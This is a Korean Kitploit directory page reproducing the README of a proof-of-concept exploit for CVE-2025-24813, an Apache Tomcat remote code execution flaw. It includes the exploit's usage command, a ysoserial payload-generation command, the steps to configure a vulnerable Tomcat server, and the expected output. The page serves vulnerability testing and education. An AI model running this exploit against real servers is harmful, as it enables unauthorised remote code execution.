Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24813-POC — CVE-2025-24813 Apache Tomcat RCE 개념 증명 (PoC) | Kitploit
도구/GitHubGitHub/alaatk/cve-2025-24813-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubalaatk/cve-2025-24813-poc

CVE-2025-24813-POC

CVE-2025-24813 Apache Tomcat RCE 개념 증명 (PoC)

저장소 보기
411년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24813 Apache Tomcat RCE PoC

CVE-2025-24813을 위한 PoC, Apache Tomcat의 원격 코드 실행(RCE) 취약점입니다.

중요: 이 PoC는 자신의 환경을 테스트하거나 교육 목적으로만 사용해야 합니다. 승인되지 않은 시스템을 익스플로잇하는 데 이 PoC를 사용하는 것은 금지되어 있으며 불법일 수 있습니다. 이 PoC의 제작자와 배포자는 오용이나 손해에 대해 책임을 지지 않습니다. 소유하지 않은 환경을 테스트하기 전에 항상 명시적 허가를 받으십시오.


사용법

root@kitploit:~
python3 CVE-2025-24813.py --url <target_url>

환경 설정

테스트 페이로드

코드에는 이미 ysoserial(https://github.com/frohoff/ysoserial)로 생성된 base64 인코딩 페이로드가 포함되어 있으며, /tmp에 RCE-success 파일을 생성합니다:

root@kitploit:~
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/RCE-success" | base64 -w 0

취약한 Tomcat 설정 구성

  1. PUT / 쓰기 액세스 활성화

$CATALINA_HOME/conf/web.xml을 편집하여 default 서블릿 이름 섹션 아래에 readonly 매개변수를 추가하고 false로 설정합니다.

root@kitploit:~
    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
          <param-name>readonly</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>
  • 세션 영속성 활성화

    • Part a) $CATALINA_HOME/conf/context.xml을 편집하고 다음 설정을 추가합니다.
    root@kitploit:~
        <Manager className="org.apache.catalina.session.PersistentManager">
          <Store className="org.apache.catalina.session.FileStore" />
        </Manager>
    
    • Part b) $CATALINA_HOME/webapps/ROOT/index.jsp를 편집하고 세션 기본 설정이 "false"가 아닌지 확인하거나 간단히 제거합니다.
    root@kitploit:~
     <%@ page session="true" pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    

    또는

    root@kitploit:~
     <%@ page pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    
  • $CATALINA_HOME/lib/에 의존성 다운로드

  • root@kitploit:~
    cd $CATALINA_HOME/lib/
    wget https[:]//repo1.maven[.]org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
    wget https[:]//repo1.maven[.]org/maven2/commons-beanutils/commons-beanutils/1.9.2/commons-beanutils-1.9.2.jar
    wget https[:]//repo1.maven[.]org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
    

    출력

    • 성공적인 익스플로잇:
    root@kitploit:~
    [+] Exploit most likely succeeded
    
    • 실패한 익스플로잇:
    root@kitploit:~
    [-] Exploit failed with status code: {status_code}, instead of 500,409
    

    데모

    도구 다운로드